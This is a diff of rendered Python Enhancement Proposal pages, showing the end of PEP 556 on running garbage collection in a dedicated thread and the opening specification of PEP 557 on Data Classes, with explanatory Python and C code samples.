+
+

Terminology

+

An “implicit” GC run (or “implicit” collection) is one that is triggered +opportunistically based on a certain heuristic computed over allocation +statistics, whenever a new allocation is requested. Details of the +heuristic are not relevant to this PEP, as it does not propose to change it.

+

An “explicit” GC run (or “explicit” collection) is one that is requested +programmatically by an API call such as gc.collect.

+

“Threaded” refers to the fact that GC runs happen in a dedicated thread +separate from sequential execution of application code. It does not mean +“concurrent” (the Global Interpreter Lock, or GIL, still serializes +execution among Python threads including the dedicated GC thread) +nor “parallel” (the GC is not able to distribute its work onto several +threads at once to lower wall-clock latencies of GC runs).

+
+
+

Rationale

+

The mode of operation for the GC has always been to perform implicit +collections synchronously. That is, whenever the aforementioned heuristic +is activated, execution of application code in the current thread is +suspended and the GC is launched in order to reclaim dead reference +cycles.

+

There is a catch, though. Over the course of reclaiming dead reference +cycles (and any ancillary objects hanging at those cycles), the GC can +execute arbitrary finalization code in the form of __del__ methods +and weakref callbacks. Over the years, Python has been used for more +and more sophisticated purposes, and it is increasingly common for +finalization code to perform complex tasks, for example in distributed +systems where loss of an object may require notifying other (logical +or physical) nodes.

+

Interrupting application code at arbitrary points to execute finalization +code that may rely on a consistent internal state and/or on acquiring +synchronization primitives gives rise to reentrancy issues that even the +most seasoned experts have trouble fixing properly [1].

+
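
A contrived sketch of the hazard (hypothetical application code): if an implicit collection triggers this finalizer while the current thread already holds the lock, that thread deadlocks against itself:

+
import threading
+
+registry_lock = threading.Lock()
+registry = {}
+
+class Handle:
+    def __del__(self):
+        # With synchronous implicit collections, this may run at an
+        # arbitrary allocation point, possibly while registry_lock is
+        # already held by the very thread executing this finalizer.
+        with registry_lock:
+            registry.pop(id(self), None)
+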

This PEP bases itself on the observation that, despite the apparent +similarities, same-thread reentrancy is a fundamentally harder +problem than multi-thread synchronization. Instead of letting each +developer or library author struggle with extremely hard reentrancy +issues, one by one, this PEP proposes to allow the GC to run in a +separate thread where well-known multi-thread synchronization practices +are sufficient.

+
+
+

Proposal

+

Under this PEP, the GC has two modes of operation:

+
    +
  • “serial”, which is the default and legacy mode, where an implicit GC +run is performed immediately in the thread that detects such an implicit +run is desired (based on the aforementioned allocation heuristic).
  • +
  • “threaded”, which can be explicitly enabled at runtime on a per-process +basis, where implicit GC runs are scheduled whenever the allocation +heuristic is triggered, but run in a dedicated background thread.
  • +
+

Hard reentrancy problems which plague sophisticated uses of finalization +callbacks in the “serial” mode become relatively easy multi-thread +synchronization problems in the “threaded” mode of operation.

+

The GC also traditionally allows for explicit GC runs, using the Python +API gc.collect and the C API PyGC_Collect. The visible semantics +of these two APIs are left unchanged: they perform a GC run immediately +when called, and only return when the GC run is finished.

+
+

New public APIs

+

Two new Python APIs are added to the gc module:

+
    +
  • gc.set_mode(mode) sets the current mode of operation (either “serial” +or “threaded”). If setting to “serial” and the current mode is +“threaded”, then the function also waits for the GC thread to end.
  • +
  • gc.get_mode() returns the current mode of operation.
  • +
+

It is allowed to switch back and forth between modes of operation.

+
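
For example, under this proposal:

+
import gc
+
+gc.set_mode("threaded")             # implicit collections now run in a
+assert gc.get_mode() == "threaded"  # dedicated background thread
+
+gc.set_mode("serial")               # waits for the GC thread to end
+assert gc.get_mode() == "serial"
+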
+
+

Intended use

+

Given the per-process nature of the switch and its repercussions on +semantics of all finalization callbacks, it is recommended that it is +set at the beginning of an application’s code (and/or in initializers +for child processes e.g. when using multiprocessing). Library functions +should probably not mess with this setting, just as they shouldn’t call +gc.enable or gc.disable, but there’s nothing to prevent them from +doing so.

+
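
A sketch of that recommendation (hypothetical application code; with the fork start method, the GC thread is not inherited by child processes, hence the initializer):

+
import gc
+import multiprocessing
+
+def init_worker():
+    gc.set_mode("threaded")
+
+if __name__ == "__main__":
+    gc.set_mode("threaded")
+    with multiprocessing.Pool(4, initializer=init_worker) as pool:
+        pass  # ... application work ...
+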
+
+

Non-goals

+

This PEP does not address reentrancy issues with other kinds of +asynchronous code execution (for example signal handlers registered +with the signal module). The author believes that the overwhelming +majority of painful reentrancy issues occur with finalizers. Most of the +time, signal handlers are able to set a single flag and/or wake up a +file descriptor for the main program to notice. As for those signal +handlers which raise an exception, they have to execute in-thread.

+

This PEP also does not change the execution of finalization callbacks +when they are called as part of regular reference counting, i.e. when +releasing a visible reference drops an object’s reference count to zero. +Since such execution happens at deterministic points in code, it is usually +not a problem.

+
+
+
+

Internal details

+

TODO: Update this section to conform to the current implementation.

+
+

gc module

+

An internal flag gc_is_threaded is added, telling whether GC is serial +or threaded.

+

An internal structure gc_mutex is added to avoid two GC runs at once:

+
static struct {
+    PyThread_type_lock lock;  /* taken when collecting */
+    PyThreadState *owner;  /* whichever thread is currently collecting
+                              (NULL if no collection is taking place) */
+} gc_mutex;
+
+
+

An internal structure gc_thread is added to handle synchronization with +the GC thread:

+
static struct {
+   PyThread_type_lock wakeup; /* acts as an event
+                                 to wake up the GC thread */
+   int collection_requested; /* non-zero if collection requested */
+   PyThread_type_lock done; /* acts as an event signaling
+                               the GC thread has exited */
+} gc_thread;
+
+
+
+
+

threading module

+

Two private functions are added to the threading module:

+
    +
  • threading._ensure_dummy_thread(name) creates and registers a Thread +instance for the current thread with the given name, and returns it.
  • +
  • threading._remove_dummy_thread(thread) removes the given thread +(as returned by _ensure_dummy_thread) from the threading module’s +internal state.
  • +
+

The purpose of these two functions is to improve debugging and introspection +by letting threading.current_thread() return a more meaningfully-named +object when called inside a finalization callback in the GC thread.

+
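
For instance, with a hypothetical finalizer:

+
import threading
+
+class Traced:
+    def __del__(self):
+        # When run by the threaded GC, this would report "GC thread"
+        # rather than an anonymous dummy thread name.
+        print("finalized in", threading.current_thread().name)
+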
+
+

Pseudo-code

+

Here is a proposed pseudo-code for the main primitives, public and internal, +required for implementing this PEP. All of them will be implemented in C +and live inside the gc module, unless otherwise noted:

+
def collect_with_callback(generation):
+    """
+    Collect up to the given *generation*.
+    """
+    # Same code as currently (see collect_with_callback() in gcmodule.c)
+
+
+def collect_generations():
+    """
+    Collect as many generations as desired by the heuristic.
+    """
+    # Same code as currently (see collect_generations() in gcmodule.c)
+
+
+def lock_and_collect(generation=-1):
+    """
+    Perform a collection with thread safety.
+    """
+    me = PyThreadState_GET()
+    if gc_mutex.owner == me:
+        # reentrant GC collection request, bail out
+        return
+    Py_BEGIN_ALLOW_THREADS
+    gc_mutex.lock.acquire()
+    Py_END_ALLOW_THREADS
+    gc_mutex.owner = me
+    try:
+        if generation >= 0:
+            return collect_with_callback(generation)
+        else:
+            return collect_generations()
+    finally:
+        gc_mutex.owner = NULL
+        gc_mutex.lock.release()
+
+
+def schedule_gc_request():
+    """
+    Ask the GC thread to run an implicit collection.
+    """
+    assert gc_is_threaded == True
+    # Note this is extremely fast if a collection is already requested
+    if gc_thread.collection_requested == False:
+        gc_thread.collection_requested = True
+        gc_thread.wakeup.release()
+
+
+def is_implicit_gc_desired():
+    """
+    Whether an implicit GC run is currently desired based on allocation
+    stats.  Return a generation number, or -1 if none desired.
+    """
+    # Same heuristic as currently (see _PyObject_GC_Alloc in gcmodule.c)
+
+
+def PyGC_Malloc():
+    """
+    Allocate a GC-enabled object.
+    """
+    # Update allocation statistics (same code as currently, omitted for brevity)
+    if is_implicit_gc_desired() >= 0:  # -1 means no collection desired
+        if gc_is_threaded:
+            schedule_gc_request()
+        else:
+            lock_and_collect()
+    # Go ahead with allocation (same code as currently, omitted for brevity)
+
+
+def gc_thread(interp_state):
+    """
+    Dedicated loop for threaded GC.
+    """
+    # Init Python thread state (omitted, see t_bootstrap in _threadmodule.c)
+    # Optional: init thread in Python threading module, for better introspection
+    me = threading._ensure_dummy_thread(name="GC thread")
+
+    while gc_is_threaded == True:
+        Py_BEGIN_ALLOW_THREADS
+        gc_thread.wakeup.acquire()
+        Py_END_ALLOW_THREADS
+        if gc_thread.collection_requested != 0:
+            gc_thread.collection_requested = 0
+            lock_and_collect(generation=-1)
+
+    threading._remove_dummy_thread(me)
+    # Signal we're exiting
+    gc_thread.done.release()
+    # Free Python thread state (omitted)
+
+
+def gc.set_mode(mode):
+    """
+    Set current GC mode.  This is a process-global setting.
+    """
+    if mode == "threaded":
+        if not gc_is_threaded:  # only launch if not already threaded
+            # Launch thread
+            gc_thread.done.acquire(block=False)  # should not fail
+            gc_is_threaded = True
+            PyThread_start_new_thread(gc_thread)
+    elif mode == "serial":
+        if gc_is_threaded == True:
+            # Wake up thread, asking it to end
+            gc_is_threaded = False
+            gc_thread.wakeup.release()
+            # Wait for thread exit
+            Py_BEGIN_ALLOW_THREADS
+            gc_thread.done.acquire()
+            Py_END_ALLOW_THREADS
+            gc_thread.done.release()
+    else:
+        raise ValueError("unsupported mode %r" % (mode,))
+
+
+def gc.get_mode():
+    """
+    Get current GC mode.
+    """
+    return "threaded" if gc_is_threaded else "serial"
+
+
+def gc.collect(generation=2):
+    """
+    Schedule collection of the given generation and wait for it to
+    finish.
+    """
+    return lock_and_collect(generation)
+
+
+
+
+
+

Discussion

+
+

Default mode

+

One may wonder whether the default mode should simply be changed to “threaded”. +For multi-threaded applications, it would probably not be a problem: +those applications must already be prepared for finalization handlers to +be run in arbitrary threads. In single-thread applications, however, it +is currently guaranteed that finalizers will always be called in the main +thread. Breaking this property may induce subtle behaviour changes or bugs, +for example if finalizers rely on some thread-local values.

+

Another problem is when a program uses fork() for concurrency. +Calling fork() from a single-threaded program is safe, +but it’s fragile (to say the least) if the program is multi-threaded.

+
+
+

Explicit collections

+

One may ask whether explicit collections should also be delegated to the +background thread. The answer is it doesn’t really matter: since +gc.collect and PyGC_Collect actually wait for the collection to +end (breaking this property would break compatibility), delegating the +actual work to a background thread wouldn’t ease synchronization with the +thread requesting an explicit collection.

+

In the end, this PEP chooses the behaviour that seems simpler to implement +based on the pseudo-code above.

+
+
+

Impact on memory use

+

The “threaded” mode incurs a slight delay in implicit collections compared +to the default “serial” mode. This obviously may change the memory profile +of certain applications. By how much remains to be measured in real-world +use, but we expect the impact to remain minor and bearable. First because +implicit collections are based on a heuristic whose effect does not result +in deterministic visible behaviour anyway. Second because the GC deals +with reference cycles while many objects are reclaimed immediately when their +last visible reference disappears.

+
+
+

Impact on CPU consumption

+

The pseudo-code above adds two lock operations for each implicit collection +request in “threaded” mode: one in the thread making the request (a +release call) and one in the GC thread (an acquire call). +It also adds two other lock operations, regardless of the current mode, +around each actual collection.

+

We expect the cost of those lock operations to be very small, on modern +systems, compared to the actual cost of crawling through the chains of +pointers during the collection itself (“pointer chasing” being one of +the hardest workloads on modern CPUs, as it lends itself poorly to +speculation and superscalar execution).

+

Actual measurements on worst-case mini-benchmarks may help provide +reassuring upper bounds.

+
+
+

Impact on GC pauses

+

While this PEP does not concern itself with GC pauses, there is a +practical chance that releasing the GIL at some point during an implicit +collection (for example by virtue of executing a pure Python finalizer) +will allow application code to run in-between, lowering the visible GC +pause time for some applications.

+

If this PEP is accepted, future work may try to better realize this potential +by speculatively releasing the GIL during collections, though it is unclear +how doable that is.

+
+
+
+

Open issues

+
    +
  • gc.set_mode should probably be protected against multiple concurrent +invocations. Also, it should raise when called from inside a GC run +(i.e. from a finalizer).
  • +
  • What happens at shutdown? Does the GC thread run until _PyGC_Fini() +is called?
  • +
+
+
+

Implementation

+

A draft implementation is available in the threaded_gc branch +[2] of the author’s Github fork [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0556.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0557/index.html b/pep-0557/index.html new file mode 100644 index 00000000000..18c1c24e9eb --- /dev/null +++ b/pep-0557/index.html @@ -0,0 +1,1090 @@ + + + + + + + + PEP 557 – Data Classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 557 – Data Classes

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Jun-2017
+
Python-Version:
+
3.7
+
Post-History:
+
08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Notice for Reviewers

+

This PEP and the initial implementation were drafted in a separate +repo: https://github.com/ericvsmith/dataclasses. Before commenting in +a public forum please at least read the discussion listed at the +end of this PEP.

+
+
+

Abstract

+

This PEP describes an addition to the standard library called Data +Classes. Although they use a very different mechanism, Data Classes +can be thought of as “mutable namedtuples with defaults”. Because +Data Classes use normal class definition syntax, you are free to use +inheritance, metaclasses, docstrings, user-defined methods, class +factories, and other Python class features.

+

A class decorator is provided which inspects a class definition for +variables with type annotations as defined in PEP 526, “Syntax for +Variable Annotations”. In this document, such variables are called +fields. Using these fields, the decorator adds generated method +definitions to the class to support instance initialization, a repr, +comparison methods, and optionally other methods as described in the +Specification section. Such a class is called a Data Class, but +there’s really nothing special about the class: the decorator adds +generated methods to the class and returns the same class it was +given.

+

As an example:

+
@dataclass
+class InventoryItem:
+    '''Class for keeping track of an item in inventory.'''
+    name: str
+    unit_price: float
+    quantity_on_hand: int = 0
+
+    def total_cost(self) -> float:
+        return self.unit_price * self.quantity_on_hand
+
+
+

The @dataclass decorator will add the equivalent of these methods +to the InventoryItem class:

+
def __init__(self, name: str, unit_price: float, quantity_on_hand: int = 0) -> None:
+    self.name = name
+    self.unit_price = unit_price
+    self.quantity_on_hand = quantity_on_hand
+def __repr__(self):
+    return f'InventoryItem(name={self.name!r}, unit_price={self.unit_price!r}, quantity_on_hand={self.quantity_on_hand!r})'
+def __eq__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) == (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __ne__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) != (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __lt__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) < (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __le__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) <= (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __gt__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) > (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __ge__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) >= (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+
+
+

Data Classes save you from writing and maintaining these methods.

+
+
+

Rationale

+

There have been numerous attempts to define classes which exist +primarily to store values which are accessible by attribute lookup. +Some examples include:

+
    +
  • collections.namedtuple in the standard library.
  • +
  • typing.NamedTuple in the standard library.
  • +
  • The popular attrs [1] project.
  • +
  • George Sakkis’ recordType recipe [2], a mutable data type inspired +by collections.namedtuple.
  • +
  • Many example online recipes [3], packages [4], and questions [5]. +David Beazley used a form of data classes as the motivating example +in a PyCon 2013 metaclass talk [6].
  • +
+

So, why is this PEP needed?

+

With the addition of PEP 526, Python has a concise way to specify the +type of class members. This PEP leverages that syntax to provide a +simple, unobtrusive way to describe Data Classes. With two exceptions, +the specified attribute type annotation is completely ignored by Data +Classes.

+

No base classes or metaclasses are used by Data Classes. Users of +these classes are free to use inheritance and metaclasses without any +interference from Data Classes. The decorated classes are truly +“normal” Python classes. The Data Class decorator should not +interfere with any usage of the class.

+

One main design goal of Data Classes is to support static type +checkers. The use of PEP 526 syntax is one example of this, but so is +the design of the fields() function and the @dataclass +decorator. Due to their very dynamic nature, some of the libraries +mentioned above are difficult to use with static type checkers.

+

Data Classes are not, and are not intended to be, a replacement +mechanism for all of the above libraries. But being in the standard +library will allow many of the simpler use cases to instead leverage +Data Classes. Many of the libraries listed have different feature +sets, and will of course continue to exist and prosper.

+

Where is it not appropriate to use Data Classes?

+
    +
  • API compatibility with tuples or dicts is required.
  • +
  • Type validation beyond that provided by PEPs 484 and 526 is +required, or value validation or conversion is required.
  • +
+
+
+

Specification

+

All of the functions described in this PEP will live in a module named +dataclasses.

+

A function dataclass which is typically used as a class decorator +is provided to post-process classes and add generated methods, +described below.

+

The dataclass decorator examines the class to find fields. A +field is defined as any variable identified in +__annotations__. That is, a variable that has a type annotation. +With two exceptions described below, none of the Data Class machinery +examines the type specified in the annotation.

+

Note that __annotations__ is guaranteed to be an ordered mapping, +in class declaration order. The order of the fields in all of the +generated methods is the order in which they appear in the class.

+

The dataclass decorator will add various “dunder” methods to the +class, described below. If any of the added methods already exist on the +class, a TypeError will be raised. The decorator returns the same +class that is called on: no new class is created.

+

The dataclass decorator is typically used with no parameters and +no parentheses. However, it also supports the following logical +signature:

+
def dataclass(*, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
+
+
+

If dataclass is used just as a simple decorator with no +parameters, it acts as if it has the default values documented in this +signature. That is, these three uses of @dataclass are equivalent:

+
@dataclass
+class C:
+    ...
+
+@dataclass()
+class C:
+    ...
+
+@dataclass(init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
+class C:
+    ...
+
+
+

The parameters to dataclass are:

+
    +
  • init: If true (the default), a __init__ method will be +generated.
  • +
  • repr: If true (the default), a __repr__ method will be +generated. The generated repr string will have the class name and +the name and repr of each field, in the order they are defined in +the class. Fields that are marked as being excluded from the repr +are not included. For example: +InventoryItem(name='widget', unit_price=3.0, quantity_on_hand=10).

    If the class already defines __repr__, this parameter is +ignored.

    +
  • +
  • eq: If true (the default), an __eq__ method will be +generated. This method compares the class as if it were a tuple of its +fields, in order. Both instances in the comparison must be of the +identical type.

    If the class already defines __eq__, this parameter is ignored.

    +
  • +
  • order: If true (the default is False), __lt__, __le__, +__gt__, and __ge__ methods will be generated. These compare +the class as if it were a tuple of its fields, in order. Both +instances in the comparison must be of the identical type. If +order is true and eq is false, a ValueError is raised.

    If the class already defines any of __lt__, __le__, +__gt__, or __ge__, then ValueError is raised.

    +
  • +
  • unsafe_hash: If False (the default), the __hash__ method +is generated according to how eq and frozen are set.

If eq and frozen are both true, Data Classes will generate a +__hash__ method for you. If eq is true and frozen is +false, __hash__ will be set to None, marking it unhashable +(which it is). If eq is false, __hash__ will be left +untouched, meaning the __hash__ method of the superclass will be +used (if the superclass is object, this means it will fall back +to id-based hashing). A short sketch illustrating these defaults appears after this parameter list.

    +

    Although not recommended, you can force Data Classes to create a +__hash__ method with unsafe_hash=True. This might be the +case if your class is logically immutable but can nonetheless be +mutated. This is a specialized use case and should be considered +carefully.

    +

    If a class already has an explicitly defined __hash__ the +behavior when adding __hash__ is modified. An explicitly +defined __hash__ is defined when:

    +
    +
      +
    • __eq__ is defined in the class and __hash__ is defined +with any value other than None.
    • +
    • __eq__ is defined in the class and any non-None +__hash__ is defined.
    • +
    • __eq__ is not defined on the class, and any __hash__ is +defined.
    • +
    +
    +

    If unsafe_hash is true and an explicitly defined __hash__ +is present, then ValueError is raised.

    +

    If unsafe_hash is false and an explicitly defined __hash__ +is present, then no __hash__ is added.

    +

    See the Python documentation [7] for more information.

    +
  • +
  • frozen: If true (the default is False), assigning to fields will +generate an exception. This emulates read-only frozen instances. +If either __getattr__ or __setattr__ is defined in the +class, then ValueError is raised. See the discussion below.
  • +
+
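
The following sketch illustrates the default hashing behaviour referred to in the unsafe_hash description above:

+
from dataclasses import dataclass
+
+@dataclass                  # eq=True, frozen=False (the defaults)
+class A:
+    x: int
+
+@dataclass(frozen=True)     # eq=True, frozen=True
+class B:
+    x: int
+
+assert A.__hash__ is None           # unhashable, as described above
+assert hash(B(1)) == hash(B(1))     # a __hash__ method was generated
+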

fields may optionally specify a default value, using normal +Python syntax:

+
@dataclass
+class C:
+    a: int       # 'a' has no default value
+    b: int = 0   # assign a default value for 'b'
+
+
+

In this example, both a and b will be included in the added +__init__ method, which will be defined as:

+
def __init__(self, a: int, b: int = 0):
+
+
+

TypeError will be raised if a field without a default value +follows a field with a default value. This is true either when this +occurs in a single class, or as a result of class inheritance.

+

For common and simple use cases, no other functionality is required. +There are, however, some Data Class features that require additional +per-field information. To satisfy this need for additional +information, you can replace the default field value with a call to +the provided field() function. The signature of field() is:

+
def field(*, default=MISSING, default_factory=MISSING, repr=True,
+          hash=None, init=True, compare=True, metadata=None)
+
+
+

The MISSING value is a sentinel object used to detect if the +default and default_factory parameters are provided. This +sentinel is used because None is a valid value for default.

+

The parameters to field() are:

+
    +
  • default: If provided, this will be the default value for this +field. This is needed because the field call itself replaces +the normal position of the default value.
  • +
  • default_factory: If provided, it must be a zero-argument +callable that will be called when a default value is needed for this +field. Among other purposes, this can be used to specify fields +with mutable default values, as discussed below. It is an error to +specify both default and default_factory.
  • +
  • init: If true (the default), this field is included as a +parameter to the generated __init__ method.
  • +
  • repr: If true (the default), this field is included in the +string returned by the generated __repr__ method.
  • +
  • compare: If True (the default), this field is included in the +generated equality and comparison methods (__eq__, __gt__, +et al.).
  • +
  • hash: This can be a bool or None. If True, this field is +included in the generated __hash__ method. If None (the +default), use the value of compare: this would normally be the +expected behavior. A field should be considered in the hash if +it’s used for comparisons. Setting this value to anything other +than None is discouraged.

    One possible reason to set hash=False but compare=True would +be if a field is expensive to compute a hash value for, that field +is needed for equality testing, and there are other fields that +contribute to the type’s hash value. Even if a field is excluded +from the hash, it will still be used for comparisons.

    +
  • +
  • metadata: This can be a mapping or None. None is treated as an +empty dict. This value is wrapped in types.MappingProxyType to +make it read-only, and exposed on the Field object. It is not used +at all by Data Classes, and is provided as a third-party extension +mechanism. Multiple third-parties can each have their own key, to +use as a namespace in the metadata.
  • +
+

If the default value of a field is specified by a call to field(), +then the class attribute for this field will be replaced by the +specified default value. If no default is provided, then the +class attribute will be deleted. The intent is that after the +dataclass decorator runs, the class attributes will all contain +the default values for the fields, just as if the default value itself +were specified. For example, after:

+
@dataclass
+class C:
+    x: int
+    y: int = field(repr=False)
+    z: int = field(repr=False, default=10)
+    t: int = 20
+
+
+

The class attribute C.z will be 10, the class attribute +C.t will be 20, and the class attributes C.x and C.y +will not be set.

+
+

Field objects

+

Field objects describe each defined field. These objects are +created internally, and are returned by the fields() module-level +method (see below). Users should never instantiate a Field +object directly. Its documented attributes are:

+
    +
  • name: The name of the field.
  • +
  • type: The type of the field.
  • +
  • default, default_factory, init, repr, hash, +compare, and metadata have the identical meaning and values +as they do in the field() declaration.
  • +
+

Other attributes may exist, but they are private and must not be +inspected or relied on.

+
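
For example, iterating over the documented attributes with the module-level fields() function described below:

+
from dataclasses import dataclass, field, fields
+
+@dataclass
+class C:
+    x: int
+    y: int = field(default=0, metadata={'unit': 'cm'})
+
+for f in fields(C):
+    print(f.name, dict(f.metadata))  # -> x {}  then  y {'unit': 'cm'}
+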
+
+

post-init processing

+

The generated __init__ code will call a method named +__post_init__, if it is defined on the class. It will be called +as self.__post_init__(). If no __init__ method is generated, +then __post_init__ will not automatically be called.

+

Among other uses, this allows for initializing field values that +depend on one or more other fields. For example:

+
@dataclass
+class C:
+    a: float
+    b: float
+    c: float = field(init=False)
+
+    def __post_init__(self):
+        self.c = self.a + self.b
+
+
+

See the section below on init-only variables for ways to pass +parameters to __post_init__(). Also see the warning about how +replace() handles init=False fields.

+
+
+

Class variables

+

One place where dataclass actually inspects the type of a field is +to determine if a field is a class variable as defined in PEP 526. It +does this by checking if the type of the field is typing.ClassVar. +If a field is a ClassVar, it is excluded from consideration as a +field and is ignored by the Data Class mechanisms. For more +discussion, see [8]. Such ClassVar pseudo-fields are not +returned by the module-level fields() function.

+
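
For example, the pseudo-field remains an ordinary class attribute but is not reported by fields():

+
from typing import ClassVar
+from dataclasses import dataclass, fields
+
+@dataclass
+class Counter:
+    value: int = 0
+    instances: ClassVar[int] = 0  # a class variable, not a field
+
+assert [f.name for f in fields(Counter)] == ['value']
+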
+
+

Init-only variables

+

The other place where dataclass inspects a type annotation is to +determine if a field is an init-only variable. It does this by seeing +if the type of a field is of type dataclasses.InitVar. If a field +is an InitVar, it is considered a pseudo-field called an init-only +field. As it is not a true field, it is not returned by the +module-level fields() function. Init-only fields are added as +parameters to the generated __init__ method, and are passed to +the optional __post_init__ method. They are not otherwise used +by Data Classes.

+

For example, suppose a field will be initialized from a database, if a +value is not provided when creating the class:

+
@dataclass
+class C:
+    i: int
+    j: int = None
+    database: InitVar[DatabaseType] = None
+
+    def __post_init__(self, database):
+        if self.j is None and database is not None:
+            self.j = database.lookup('j')
+
+c = C(10, database=my_database)
+
+
+

In this case, fields() will return Field objects for i and +j, but not for database.

+
+
+

Frozen instances

+

It is not possible to create truly immutable Python objects. However, +by passing frozen=True to the @dataclass decorator you can +emulate immutability. In that case, Data Classes will add +__setattr__ and __delattr__ methods to the class. These +methods will raise a FrozenInstanceError when invoked.

+

There is a tiny performance penalty when using frozen=True: +__init__ cannot use simple assignment to initialize fields, and +must use object.__setattr__.

+
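
For example:

+
from dataclasses import dataclass, FrozenInstanceError
+
+@dataclass(frozen=True)
+class Point:
+    x: int
+    y: int
+
+p = Point(1, 2)
+try:
+    p.x = 3
+except FrozenInstanceError:
+    pass  # assigning to a field of a frozen instance raises
+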
+
+

Inheritance

+

When the Data Class is being created by the @dataclass decorator, +it looks through all of the class’s base classes in reverse MRO (that +is, starting at object) and, for each Data Class that it finds, +adds the fields from that base class to an ordered mapping of fields. +After all of the base class fields are added, it adds its own fields +to the ordered mapping. All of the generated methods will use this +combined, calculated ordered mapping of fields. Because the fields +are in insertion order, derived classes override base classes. An +example:

+
@dataclass
+class Base:
+    x: Any = 15.0
+    y: int = 0
+
+@dataclass
+class C(Base):
+    z: int = 10
+    x: int = 15
+
+
+

The final list of fields is, in order, x, y, z. The final +type of x is int, as specified in class C.

+

The generated __init__ method for C will look like:

+
def __init__(self, x: int = 15, y: int = 0, z: int = 10):
+
+
+
+
+

Default factory functions

+

If a field specifies a default_factory, it is called with zero +arguments when a default value for the field is needed. For example, +to create a new instance of a list, use:

+
l: list = field(default_factory=list)
+
+
+

If a field is excluded from __init__ (using init=False) and +the field also specifies default_factory, then the default factory +function will always be called from the generated __init__ +function. This happens because there is no other way to give the +field an initial value.

+
+
+

Mutable default values

+

Python stores default member variable values in class attributes. +Consider this example, not using Data Classes:

+
class C:
+    x = []
+    def add(self, element):
+        self.x.append(element)
+
+o1 = C()
+o2 = C()
+o1.add(1)
+o2.add(2)
+assert o1.x == [1, 2]
+assert o1.x is o2.x
+
+
+

Note that the two instances of class C share the same class +variable x, as expected.

+

Using Data Classes, if this code was valid:

+
@dataclass
+class D:
+    x: List = []
+    def add(self, element):
+        self.x.append(element)
+
+
+

it would generate code similar to:

+
class D:
+    x = []
+    def __init__(self, x=x):
+        self.x = x
+    def add(self, element):
+        self.x.append(element)
+
+assert D().x is D().x
+
+
+

This has the same issue as the original example using class C. +That is, two instances of class D that do not specify a value for +x when creating a class instance will share the same copy of +x. Because Data Classes just use normal Python class creation +they also share this problem. There is no general way for Data +Classes to detect this condition. Instead, Data Classes will raise a +TypeError if it detects a default parameter of type list, +dict, or set. This is a partial solution, but it does protect +against many common errors. See Automatically support mutable +default values in the Rejected Ideas section for more details.

+

Using default factory functions is a way to create new instances of +mutable types as default values for fields:

+
@dataclass
+class D:
+    x: list = field(default_factory=list)
+
+assert D().x is not D().x
+
+
+
+
+

Module level helper functions

+
    +
  • fields(class_or_instance): Returns a tuple of Field objects +that define the fields for this Data Class. Accepts either a Data +Class, or an instance of a Data Class. Raises ValueError if not +passed a Data Class or instance of one. Does not return +pseudo-fields which are ClassVar or InitVar.
  • +
  • asdict(instance, *, dict_factory=dict): Converts the Data Class +instance to a dict (by using the factory function +dict_factory). Each Data Class is converted to a dict of its +fields, as name:value pairs. Data Classes, dicts, lists, and tuples +are recursed into. For example:
    @dataclass
    +class Point:
    +     x: int
    +     y: int
    +
    +@dataclass
    +class C:
    +     l: List[Point]
    +
    +p = Point(10, 20)
    +assert asdict(p) == {'x': 10, 'y': 20}
    +
    +c = C([Point(0, 0), Point(10, 4)])
    +assert asdict(c) == {'l': [{'x': 0, 'y': 0}, {'x': 10, 'y': 4}]}
    +
    +
    +

    Raises TypeError if instance is not a Data Class instance.

    +
  • +
• astuple(instance, *, tuple_factory=tuple): Converts the Data Class +instance to a tuple (by using the factory function +tuple_factory). Each Data Class is converted to a tuple of its +field values. Data Classes, dicts, lists, and tuples are recursed +into.

    Continuing from the previous example:

    +
    assert astuple(p) == (10, 20)
    +assert astuple(c) == ([(0, 0), (10, 4)],)
    +
    +
    +

    Raises TypeError if instance is not a Data Class instance.

    +
  • +
  • make_dataclass(cls_name, fields, *, bases=(), namespace=None): +Creates a new Data Class with name cls_name, fields as defined +in fields, base classes as given in bases, and initialized +with a namespace as given in namespace. fields is an +iterable whose elements are either name, (name, type), or +(name, type, Field). If just name is supplied, +typing.Any is used for type. This function is not strictly +required, because any Python mechanism for creating a new class with +__annotations__ can then apply the dataclass function to +convert that class to a Data Class. This function is provided as a +convenience. For example:
    C = make_dataclass('C',
    +                   [('x', int),
    +                     'y',
    +                    ('z', int, field(default=5))],
    +                   namespace={'add_one': lambda self: self.x + 1})
    +
    +
    +

    Is equivalent to:

    +
    @dataclass
    +class C:
    +    x: int
    +    y: 'typing.Any'
    +    z: int = 5
    +
    +    def add_one(self):
    +        return self.x + 1
    +
    +
    +
  • +
  • replace(instance, **changes): Creates a new object of the same +type of instance, replacing fields with values from changes. +If instance is not a Data Class, raises TypeError. If +values in changes do not specify fields, raises TypeError.

